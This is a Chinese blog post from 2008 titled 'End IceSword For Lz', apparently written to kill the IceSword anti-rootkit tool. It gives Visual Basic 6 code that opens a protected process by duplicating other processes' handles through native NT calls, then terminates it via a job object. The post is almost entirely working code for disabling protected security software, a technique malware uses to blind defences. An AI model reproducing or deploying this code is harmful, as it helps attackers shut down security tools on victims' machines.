上一篇
下一篇
End IceSword For Lz
作者:JiaJia 日期:2008-01-24
引用内容//form
Option Explicit
Private Sub Command1_Click()
On Error Resume Next
MsgBox IIf(TerminateProc(Text1.Text), "成功", "失败")
End Sub
Private Function TerminateProc(ByVal pid As Long) As Boolean
Dim hproc As Long
hproc = OpenProcess(PROCESS_ALL_ACCESS, False, pid)
TerminateProc = TerminateProcess(hproc, 0)
ZwClose (hproc)
End Function
//module
Option Explicit
Private Sub CopyMemory(ByVal Dest As Long, ByVal Src As Long, ByVal cch As Long)
Dim Written As Long
Call ZwWriteVirtualMemory(ZwCurrentProcess, Dest, Src, cch, Written)
End Sub
'before you call this function, you need SE_DEBUG, ret value=hProcess
Public Function OpenProcess(ByVal dwDesiredAccess As Long, _
ByVal bInhert As Boolean, _
ByVal ProcessId As Long) As Long
Dim st As Long
Dim cid As CLIENT_ID
Dim oa As OBJECT_ATTRIBUTES
Dim NumOfHandle As Long
Dim pbi As PROCESS_BASIC_INFORMATION
Dim I As Long
Dim hProcessToDup As Long, hProcessCur As Long, hProcessToRet As Long
oa.Length = Len(oa)
If (bInhert) Then oa.Attributes = oa.Attributes Or OBJ_INHERIT
cid.UniqueProcess = ProcessId
st = ZwOpenProcess(hProcessToRet, dwDesiredAccess, oa, cid)
If (NT_SUCCESS(st)) Then OpenProcess = hProcessToRet: Exit Function
st = 0
Dim bytBuf() As Byte
Dim arySize As Long: arySize = 1
Do
ReDim bytBuf(arySize)
st = ZwQuerySystemInformation(SystemHandleInformation, VarPtr(bytBuf(0)), arySize, 0&)
If (Not NT_SUCCESS(st)) Then
If (st <> STATUS_INFO_LENGTH_MISMATCH) Then
Erase bytBuf
Exit Function
End If
Else
Exit Do
End If
arySize = arySize * 2
ReDim bytBuf(arySize)
Loop
NumOfHandle = 0
Call CopyMemory(VarPtr(NumOfHandle), VarPtr(bytBuf(0)), Len(NumOfHandle))
Dim h_info() As SYSTEM_HANDLE_TABLE_ENTRY_INFO
ReDim h_info(NumOfHandle)
Call CopyMemory(VarPtr(h_info(0)), VarPtr(bytBuf(0)) + Len(NumOfHandle), Len(h_info(0)) * NumOfHandle)
For I = LBound(h_info) To UBound(h_info)
With h_info(I)
If (.ObjectTypeIndex = OB_TYPE_PROCESS) Then 'OB_TYPE_PROCESS is hardcode, you'd better get it dynamiclly
cid.UniqueProcess = .UniqueProcessId
st = ZwOpenProcess(hProcessToDup, PROCESS_DUP_HANDLE, oa, cid)
If (NT_SUCCESS(st)) Then
st = ZwDuplicateObject(hProcessToDup, .HandleValue, ZwGetCurrentProcess, hProcessCur, PROCESS_ALL_ACCESS, 0, DUPLICATE_SAME_ATTRIBUTES)
If (NT_SUCCESS(st)) Then
st = ZwQueryInformationProcess(hProcessCur, ProcessBasicInformation, VarPtr(pbi), Len(pbi), 0)
If (NT_SUCCESS(st)) Then
If (pbi.UniqueProcessId = ProcessId) Then
st = ZwDuplicateObject(hProcessToDup, .HandleValue, ZwGetCurrentProcess, hProcessToRet, dwDesiredAccess, OBJ_INHERIT, DUPLICATE_SAME_ATTRIBUTES)
If (NT_SUCCESS(st)) Then OpenProcess = hProcessToRet
End If
End If
End If
st = ZwClose(hProcessCur)
End If
st = ZwClose(hProcessToDup)
End If
End With
Next
Erase h_info
End Function
'ret val: bSuccess
Public Function TerminateProcess(ByVal hProcess As Long, _
ByVal ExitStatus As Long) As Boolean
Dim st As Long
Dim hJob As Long
Dim oa As OBJECT_ATTRIBUTES
TerminateProcess = False
oa.Length = Len(oa)
st = ZwCreateJobObject(hJob, JOB_OBJECT_ALL_ACCESS, oa)
If (NT_SUCCESS(st)) Then
st = ZwAssignProcessToJobObject(hJob, hProcess)
If (NT_SUCCESS(st)) Then
st = ZwTerminateJobObject(hJob, ExitStatus)
If (NT_SUCCESS(st)) Then TerminateProcess = True
End If
ZwClose (hJob)
End If
End Function
文章来自: 
引用通告: 
Tags: 评论: 0 | 引用: 0 | 查看次数: -
发表评论